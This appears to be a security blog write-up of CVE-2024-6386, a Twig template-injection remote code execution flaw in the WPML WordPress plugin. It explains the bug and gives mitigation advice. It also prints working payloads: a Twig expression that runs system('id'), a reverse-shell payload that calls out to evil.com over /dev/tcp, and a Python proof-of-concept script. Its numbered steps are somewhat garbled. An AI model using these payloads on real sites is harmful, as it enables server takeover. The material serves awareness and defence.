The WordPress Multilingual Plugin (WPML) is one of the most popular translation plugins in the WordPress ecosystem, boasting over a million active installations. However, a newly uncovered and serious vulnerability, CVE-2024-6386, puts any site running WPML at risk. In this long read, we will break down what went wrong, show you how the exploit works, and offer mitigation tips to keep your site safe.
What is CVE-2024-6386?
CVE-2024-6386 refers to a Remote Code Execution (RCE) vulnerability in all versions of WPML up to and including 4.6.12.
The bug is caused by inadequate input validation in the plugin’s use of the Twig templating system. Specifically, the render function in WPML fails to properly sanitize and validate user-supplied input, allowing attackers with at least Contributor access to inject malicious Twig templates that the server then executes.
Remote Code Execution: An attacker can run arbitrary PHP code on your server.
- Permission Scope: The attacker needs Contributor-level access or above, not full admin. Contributor accounts are easy to acquire through vulnerable registration forms or social engineering.
- Widespread Impact: All versions up to 4.6.12 are affected, meaning hundreds of thousands of sites are exposed unless patched.
The Core Issue: Twig Server-Side Template Injection
WPML uses the Twig templating engine to display translation content. Twig is safe by default, but must not be given untrusted input. In this bug, WPML exposes a render function (exact location varies per version) that renders Twig templates using data supplied through plugin features.
Problem: Input passed to the render function isn’t properly filtered. Attackers can submit Twig templates containing dangerous expressions, which get executed on the backend.
Here’s a basic illustration
// The vulnerable function in WPML
public function render($template, $context = []) {
$twig = new \Twig\Environment(...); // Setup Twig
return $twig->render($template, $context); // No input validation
}
If $template comes from user input, an attacker can craft a Twig template like
{{ system('id') }}
If this goes through unchecked, PHP will execute system('id') and return output from the shell—proof that they have code exec.
Register as a Contributor on the WPML-affected WordPress site (or compromise such an account).
2. Find a feature in WPML (e.g., a translation string editor or custom field) that lets you submit or edit template content.
Trigger the render function by using the frontend or backend feature that displays the string.
5. Enjoy shell output—the server will reveal the result of whoami in the page or in a debug response.
More Dangerous Payload
Attackers frequently try for a full reverse shell. Here’s what that might look like (payload encoded for Twig):
{{ system('bash -c "bash -i >& /dev/tcp/evil.com/4444 >&1"') }}
Proof-of-Concept (PoC)
Below is a simplified PoC for automation. ⚠️ Never run this on production systems!
import requests
site = "https://vulnerable-wpml.com";
login_url = site + "/wp-login.php"
exploit_url = site + "/wp-content/plugins/wpml/vulnerable-endpoint"
data = {
"user_login": "contributor",
"user_pass": "password",
"submit": "Log In"
}
session = requests.Session()
session.post(login_url, data=data)
# Insert malicious Twig template
payload = "{{ system('id') }}"
exploit_data = {
"template_content": payload
}
response = session.post(exploit_url, data=exploit_data)
print(response.text) # Should contain output of 'id'
*Note: Actual endpoints may differ; the principle remains the same.*
References & More Reading
- WPScan vulnerability entry: WPML < 4.6.13 - Authenticated (Contributor+) Remote Code Execution via Twig
- Official WPML plugin site: wpml.org
- Twig Documentation: Twig Security
- How Template Injection Works: PortSwigger - SSTI
Monitor for Attacks: Examine site logs for suspicious template content or system command usage.
4. Harden Your Server: Use web app firewalls and disable dangerous PHP functions (system, exec, etc.).
Conclusion
CVE-2024-6386 is a textbook example of why strict input validation is so crucial, especially when working with powerful features like server-side templating engines. Any site running a vulnerable WPML version is exposed to a complete takeover by authenticated attackers. Patch now, review your user roles, and never trust user input in critical backend logic.
Stay safe out there. 👨💻
*This post was written exclusively for learning and awareness. Please use this knowledge for good and help keep the web secure.*
Timeline
Published on: 08/21/2024 21:15:08 UTC
Last modified on: 08/22/2024 12:48:02 UTC